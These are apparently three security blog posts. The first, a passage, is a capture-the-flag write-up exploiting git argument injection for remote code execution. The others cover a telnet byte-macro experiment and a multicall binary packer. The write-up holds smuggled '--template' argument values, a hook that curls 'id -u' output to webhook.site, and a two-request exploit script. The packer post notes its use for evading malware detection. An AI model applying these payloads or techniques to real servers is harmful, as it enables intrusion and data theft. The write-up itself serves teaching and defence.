This is very interesting looking logic to us, as it involves program execution and disk IO using values provided by user input. Knowing how execFileSync works, and knowing that in this code the file argument is hardcoded to be git, we know that we cannot attempt to control this. We can however potentially control the argument array, depending on how the parseArgs() function handles the string built from some user input that is handed off to it. Because of how execFileSync works, we cannot inject shell control characters like &&, ||, ;, $(), or other similar common attacks against program execution providers.

If we read through the parseArgs() function and work out what it actually does, we see that it splits a string into an array on spaces, unless the space is inside of quotes, removing quotes. If we copy and paste the function and run it locally with some test inputs that could conceivably be built from valid user inputs, we can see a string like clone "https://github.com/testuser/testrepo" "testInstance" gets parsed into the array ['clone', 'https://github.com/testuser/testrepo', 'testInstance']. Seeing how this works and thinking about what inputs we control gets us to a place where we can start testing some requests out against the running challenge instance.
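
A function with the described behavior looks roughly like this (a reconstruction, not the challenge's exact implementation), along with the local test mentioned above:

  function parseArgs(str) {
    const args = [];
    let current = '';
    let inQuotes = false;
    for (const ch of str) {
      if (ch === '"') inQuotes = !inQuotes;                                // quotes toggle and are dropped
      else if (ch === ' ' && !inQuotes) { args.push(current); current = ''; }
      else current += ch;
    }
    args.push(current);
    return args;
  }

  parseArgs('clone "https://github.com/testuser/testrepo" "testInstance"');
  // -> [ 'clone', 'https://github.com/testuser/testrepo', 'testInstance' ]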

Digging Deeper

Now that we know a backend /repo_has_conf route exists, we can try making a request to this endpoint through the /api/function_proxy endpoint. Putting together a request that should do this, we see we can successfully access the /repo_has_conf endpoint and get a 400 bad response due to not providing a repoName.

request failed successfully

We can try creating an example repo on GitHub that has a top level config.json file, and see if it is able to clone and identify the file properly when requested. If we do this, and send the request to check for it, we see it does successfully clone the repo and validate the existence of the config.json file.

success request

Seeing as we can make requests for repo configuration checks properly, we can start trying to make checks improperly. We can try to pass quotes in with the repoName, and see if, when they get sent through parseArgs, additional arguments are parsed out. From our source code review, we know that the string being built to split into an arguments array is clone "https://github.com/${repoName}" "${instanceId}". We can try injecting quotes into our repoName query parameter and see if we get a desirable outcome. If we try a repoName of exampleUser/exampleRepo" test " we get a result telling us that no repo configuration was found, meaning it likely errored when attempting the git clone. If we try a repoName of exampleUser/exampleRepo" -j "1 we get a result telling us that a repo configuration was found, meaning that the clone happened successfully, and the config.json file was found.

success request

Breaking down what is happening here: in the first case, where the clone failed, the following command line argument string is built server side, clone "https://github.com/exampleUser/exampleRepo" test "" "someRandomGuid", which when run through our local version of parseArgs results in the argument array ['clone', 'https://github.com/exampleUser/exampleRepo', 'test', '', 'someRandomGuid']. This has extra arguments that will make git throw an error. We can test this locally by taking these arguments and attempting to run git clone https://github.com/exampleUser/exampleRepo test someRandomGuid, which results in fatal: Too many arguments.

In the second case, the following command line argument string is built server side, clone "https://github.com/exampleUser/exampleRepo" -j "1" "someRandomGuid", which when run through our local version of parseArgs results in the argument array ['clone', 'https://github.com/exampleUser/exampleRepo', '-j', '1', 'someRandomGuid']. This is a valid git clone call, as the -j flag is used to specify the number of submodule fetch jobs.

Seeing as the application logic is flawed and we are able to inject arbitrary extra arguments to a git program execution that occurs server side, we can now begin looking into ways to take advantage of this.

Building An Exploit

Knowing that we can inject arbitrary arguments after a certain point in the argument array for a git command, it stands to reason we should look deeper into the extra argument flags supported by git, specifically, in our case, for git clone. We can review the official documentation here. Looking through this, an interesting flag that stands out is the --template flag. It allows us to specify a path to a local directory that will be used as a template directory for the cloned repository. Templates provide some files, but also include githooks that will be copied from the template directory and triggered on the newly cloned repository as appropriate. This includes the post-checkout hook, which executes after a successful git clone.

We can play around with this locally, setting up a ./template/ directory containing a hooks directory with an executable post-checkout shell script in it. We can then clone any valid repo, passing the relative path to the template directory after the --template flag, and it will clone the repo and run the post-checkout hook from the template directory, as seen below.

hook run

Seeing this working locally makes it easier to understand how an attack could be operationalized against the remote server. We can inject a --template flag that points to a relative path on the filesystem of the remote server containing user controlled content. The problem for us is getting user controlled content at a known relative path on the remote server's filesystem. Fortunately, the same logic that allows for this malicious git clone call also allows for arbitrary file creation at a known path. We know that we can provide an instanceId value, and that the specified repoName will be cloned to that path. We can use this to do a two part exploit: one call that gets a repo with a directory of hook scripts in it cloned to a known relative path on the filesystem, to be used as a template later, and another that actually injects the --template flag and references the path to the first repo.

First, we set up our template directory in our example repo and create a hooks directory in it. We then create a post-checkout shell script containing a curl command to a remote server, in this case webhook.site, that adds the current user id to the end of the URL so we get a response back from our otherwise blind execution. We push these changes, and our repo layout looks like the below image.

repo layout

We can now make a request to the server with our repoName an untampered reference to our repo, and our instanceId set to a known value, in this example, we can call it templateDir.

template cloned

The server responds saying that the config file was found, meaning the clone was successful and that our template directory should now exist at a path of templateDir/templates relative to the git clone process working directory. Knowing this, we can now do a second clone, this time injecting extra arguments into the git clone process via the repoName, by specifying a repoName of exampleUser/exampleRepo" --template "templateDir/templates. Making this request should trigger the execution of the hook from our first clone after this second clone's checkout is completed, which should make a curl request to our webhook.site endpoint with the user id of the user the remote server process is running as.

rce request made

The server says the config was found, which means the clone was successful and no errors were thrown by the injected template. Checking our webhook.site page that the script curls the result of our id -u command to, we see that we did indeed get a request from a curl user agent with a uid in the path, confirming our RCE on our target and proving that our exploit worked.

rce confirmed

This process can be cleaned up a bit, and boiled down into a python script for a stable exploit where a properly configured repo with a post-checkout hook to run as the RCE payload is provided as input.
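
The actual exploit was a Python script; sketched in Node instead, the two proxied requests it boils down to look something like this (the frontend hostname and the attacker repo are placeholders):

  const axios = require('axios');
  const PROXY = 'http://challenge.example/api/function_proxy';     // placeholder frontend host
  const headers = { Authorization: 'anything' };                   // must be present, value never checked

  async function repoHasConf(repoName, instanceId) {
    const inner = 'http://backend:8080/repo_has_conf'
      + '?repoName=' + encodeURIComponent(repoName)
      + '&instanceId=' + encodeURIComponent(instanceId);
    const res = await axios.get(PROXY, { params: { url: inner }, headers });
    return res.data;
  }

  (async () => {
    // 1. Clone the attacker controlled repo (carrying templates/hooks/post-checkout) to a known path.
    await repoHasConf('exampleUser/exampleRepo', 'templateDir');
    // 2. Clone again, injecting --template so the hook from step 1 fires after this checkout.
    await repoHasConf('exampleUser/exampleRepo" --template "templateDir/templates', 'run' + Date.now());
  })();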

Conclusion

There are a lot of different takeaways here, and a lot of them could be left as an exercise to the reader. In this specific case, white box testing sure was valuable, as the vulnerability would likely never have been discovered otherwise, since nothing else referenced the vulnerable code. It is important to be very aware of and picky about how non static values are used to build program execution directives. Aspects of this challenge may seem a bit contrived and weird, but know that it was modeled to result in a very similar final exploit script to a real world finding.


Byte Macro: Implementing an Obscure Telnet Option

Sun 15 Aug 2021 05:26:11 PM EDT

The telnet protocol is an interesting one, full of a lot of history I am totally ignorant of. While playing around with implementing a telnet server that spoke some of the more telnet specific protocol language, I went through the list of telnet command options and one stood out particularly to me. Option 19, byte macros, allows for customizable macro definitions where a single byte will be translated into a replacement string after being received. Unfortunately, no telnet client I found was willing to support this option; each would just respond with IAC WONT BM, telnet protocol for refusing to support an option, and would proceed to ignore any subnegotiations specifying byte macro translations.

Background

Telnet's protocol for setting options is fairly simple and involves some negotiation between clients and servers. Either party can send a DO or DONT byte to the other, followed by an option code. The other party will then respond with a WILL or WONT byte followed by the option code, telling the requester whether it will or will not support that option. All of these communications begin with an IAC byte, short for Interpret As Command. A request for byte macro option support, for example, would look something like IAC DO BM. A response to it could look like IAC WILL BM. Each of these constants translates to a fixed byte value. For example, IAC translates to 0xFF, or as the telnet rfc calls it, "Data Byte 255." The series of constants IAC DO BM translated to hex would look like 0xFF 0xFD 0x13.

telnet protocol

Byte Macro is an obscure, likely long forgotten and unsupported telnet option that, upon googling, nobody really seems to talk or think about. It allows one side of the telnet connection to tell the other that, instead of sending a certain series of bytes, it should send only a single byte, which will be replaced with that series of bytes before being processed. In common terms, the server could tell the client, "Hey, instead of sending me the string 'nslookup', just send me a single 0x96 instead and I'll know what you mean." The rfc from 1977 states this option is intended to serve as a simple data compression technique.

A subnegotiation for an actual byte macro definition is in the form of IAC SB BM [DEFINE] [macro byte] [count] [replacement string] IAC SE, where SB and SE mark the start and end of a subnegotiation respectively, [DEFINE] is a constant 1, [macro byte] is the byte that the sender wants to receive in place of [replacement string] and will take to mean it, and [count] is the number of bytes of [replacement string]. If the recipient of this subnegotiation supports the byte macro option, it will send back a subnegotiation detailing that it is accepting the definition of the macro byte. The recipient can also refuse definitions for various reasons. The below image shows an example of a definition being made of macro byte 0x89 being used to represent the replacement string of "rc".

byte macro definition subnegotiation
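
In code, building that same definition subnegotiation might look like the following sketch (constant values taken from the option codes described above):

  // Telnet command bytes: IAC=255, SB=250, SE=240; option BM (byte macro)=19; BM DEFINE=1
  const IAC = 0xff, SB = 0xfa, SE = 0xf0, BM = 0x13, DEFINE = 0x01;

  // Build a subnegotiation defining macroByte as a stand-in for the replacement string.
  function defineByteMacro(macroByte, replacement) {
    const repl = Buffer.from(replacement, 'ascii');
    return Buffer.concat([
      Buffer.from([IAC, SB, BM, DEFINE, macroByte, repl.length]),
      repl,
      Buffer.from([IAC, SE]),
    ]);
  }

  defineByteMacro(0x89, 'rc');
  // -> ff fa 13 01 89 02 72 63 ff f0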

When playing with implementing my own telnet server in nodejs, I tried to see if the default telnet client on my debian box, Linux Netkit 0.17 telnet, would respond positively to a request to support the byte macro option, and was disappointed when it wouldn't. Upon looking at a few more clients, none of them were willing to support it out of the box. I don't know if there is a client out there that supports the option or not; instead of researching that further, I decided to jump the gun and implement my own wrapper for the client I already had on my machine to support a subset of the byte macro option.

Implementation

The wrapper I wrote for the telnet client involves a few logical parts:

The custom telnet server implementation I wrote is very naive and functions with a few rules:

Demonstration

The actual source code of these components can be found here. A segment of the resulting communication between these components setting a byte macro and then using it can be seen as follows.

byte macro discussion

The first message is from the server to the client, telling it to support byte macros and then listing a subnegotiation for a byte macro where instead of sending "ls" the client will send 0x89.

The second message is from the client to the server, telling it that it will support byte macros and then accepting the byte macro for 0x89.

The third message is from the client to the server, telling it "\x89 -a\r\n", or, the byte macro translated version of "ls -a\r\n".

The fourth message is from the server to the client and includes the response to the server running ls -a on its /bin/sh subprocess.

It is clear that the client and server both recognize the byte macro to translate 0x89 as a macro for ls and the command is run successfully.

Conclusion

Byte Macros, while they may not be useful in any realistic situation or even supported, are an example and a reminder that even protocols as old and simple as telnet can support strange things. Verifying that a communication for a protocol is "valid" doesn't mean it isn't using some option nobody has ever heard of under the hood that may allow for unforeseen consequences. It is very interesting that writing a wrapper for a telnet client to do byte macro expansion is valid telnet protocol, and that there's even a reserved option for it. Learning and understanding the full feature sets of applications and protocols is a surprising and sometimes scary experience. It can reveal just how many strange oddities are sitting there covered in dust, so rarely thought of that they could very well break some system later down the road.


Multicall Binary Packer

Wed 28 Apr 2021 05:47:27 PM

Multicall binaries are cool. Packers are cool. I wanted to make a proof of concept packer that would pack multiple binaries into a multicall binary because it sounded cool squared. I also wanted to see if I could even do it and if I could think of any use for it.

Background

A multicall binary is a binary that changes behavior based on the name it is executed as. Busybox is probably the most common example of this. Busybox is a size optimized collection of userland tools and programs that exists as a single multicall binary. Depending on the name this binary is executed as, a different codepath is run. Creating a soft link called ls that points to /bin/busybox and executing it will invoke /bin/busybox with argv[0] as ls, which the busybox binary will see and then run only the codepath for ls. Having several different utilities in one binary like this allows for code sharing and reuse with less overhead and allows busybox to be even smaller.

A packer is a tool that packs a compiled binary into a new binary that runs the packed binary, usually transforming it in some way either for compression reasons or to avoid malware detection. This is commonly used for malicious purposes.

A multicall packed binary therefore would be a binary that has several existing binaries packed into it. It would choose which one to unpack and execute based on the name it is executed as, hence, multicall. It loses the practical purpose of code sharing from a traditional multicall binary because each unique call is its own independently compiled binary running only its own code. There isn't really a good use for this beyond it being a cool party trick and a way to take binaries already on a system and fuse them into one multicall binary.

My plan to implement this was to write a nodejs script that ingested a list of paths of binaries on the system to pack into one multicall binary. The script would then copy over some C files with code to act as a multicall binary and generate header files that included the bytes of the binaries. These would then all be compiled into a binary that would unpack and execute different binaries based on the name it is run as.
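
The header generation step can be sketched like this. It is an illustrative sketch only; the identifier names and layout differ from the actual script:

  const fs = require('fs');
  const path = require('path');

  // Turn one input binary into a C header holding its name, bytes, and size,
  // for inclusion by the multicall template C code.
  function writeBinaryHeader(binaryPath, index, outDir) {
    const bytes = fs.readFileSync(binaryPath);
    const name = path.basename(binaryPath);
    const header =
      `static const char bin_${index}_name[] = "${name}";\n` +
      `static const unsigned char bin_${index}_data[] = {${Array.from(bytes).join(',')}};\n` +
      `static const unsigned long bin_${index}_size = ${bytes.length};\n`;
    fs.writeFileSync(path.join(outDir, `bin_${index}.h`), header);
  }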

Implementation

The source for my proof of concept multicall binary packer can be found here.

The script itself follows the following steps:

The template C files that get built into the multicall packed binary follow the following execution steps:

The C code relies heavily on abusing the preprocessor and including files in odd places with fixed names that get generated by the script. The key to all of this is the memfd_create call, which allows the unpacked selected binary to be written to a file that exists only in memory and executed from the resulting file descriptor.

Demo

A file will be created named "binary_list.txt" that includes the binaries to be packed into a single multicall binary.

The binary list

The script will then be called with the list file passed as an argument and it will build the multicall binary in the build/ folder.

The binary list

From there the mcall binary can be executed and it will do nothing. Creating a symlink for each packed binary inside will allow you to execute mcall with a different name, having it unpack and execute the selected binary.

The binary list

Copying the mcall binary to a file named after each packed binary would also work to have it unpack and execute the specified binary.

Conclusion

While it may not be useful, it is very much possible, and not very difficult, to compress and pack entire binaries into one binary that unpacks and executes a packed binary based on the name it is executed as. This could be a cool party trick or an interesting way to mess with a friend you are on a system with, but it doesn't seem very practical or useful. It was a cool thing to figure out how to get working, and I'm pretty happy with the end result. It's cool to see the things you can do that there really is no reason to do, and to punch around code until you get it working. Now I can pack any binary into anything and slip in some extra binaries if I want, as limitedly useful as this is.